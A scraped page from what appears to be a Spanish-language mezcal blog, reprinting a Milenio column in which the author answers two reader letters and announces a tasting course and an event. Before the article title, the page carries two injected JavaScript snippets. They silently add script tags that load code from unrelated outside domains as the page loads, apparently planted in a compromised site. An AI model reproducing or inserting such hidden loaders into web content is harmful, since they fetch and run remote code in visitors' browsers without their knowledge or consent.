;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Mezcales Tradicionales de los Pueblos de México » 97. Sobre dos cartas de lectores

97. Sobre dos cartas de lectores


A raíz del artículo “Método ridículo para evaluar mezcales” del 24 de septiembre (http://impreso.milenio.com/node/9031942), recibí dos misivas que discrepan o de plano rebaten mis puntos de vista, una en mi dirección de correo y otra que llegó a la dirección de Milenio.
La primera, de Andrés Padilla, dice: “El gusto histórico nos
puede decir muchas cosas, pero porqué sin ello no puedes decidir cuál [mezcal] te
gusta más, de acuerdo a tu experiencia personal. Poniéndote tan riguroso lo que transmites es inseguridad para definir algo
tan simple como qué es para ti un buen mezcal tradicional [MT]. Sin
prejuicios”.
La segunda, firmada por América Delgado, Mauricio Soberanes, Jorge Larson y Selene Rangel de Metrocert (www.metrocert.com), empresa de certificación orgánica, dice que: “la columna hace referencia a la invitación que le hicimos a Cornelio Pérez a participar en una descripción colectiva de mezcales de Michoacán”. Esto sí que es falso, pues el proyecto en cuestión, que puede consultarse en el sitio citado, aparece con el link “Trazabilidad de destilados de agave en Michoacán”.
Plantear a los productores de MT de Michoacán que lo que ellos elaboran ahora se llama destilado de agave es ofensivo e indignante, pues de manera cantinflesca ahora resulta que lo que todos en Michoacán conocen como mezcales, ya no lo son: esto sí que es rotundamente ridículo. En esta columna se ha sostenido el derecho irrenunciable a llamarlos como lo que son: mezcales ( http://impreso.milenio.com/node/8886352).
Hoy sábado impartiremos un cuso de MT para el diligente personal del restaurante Casa Oaxaca, comandado por el siempre afable chef Alejandro Ruiz. Saborearemos MT del Edomex, Puebla, Michoacán, Jalisco, Guerrero y otros cinco oaxaqueños de los distritos de Tlacolula, Ocotlán, Ejutla y Miahuatlán.
El martes 18 a las 20 horas se llevará a cabo la última sesión de la Logia de los Mezcólatras en Red Fly (Orizaba 145, Roma DF), pues cerrará temporalmente por remodelación. Habrá sorpresas.

http://impreso.milenio.com/node/9044439

Category: Milenio, Publicaciones

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *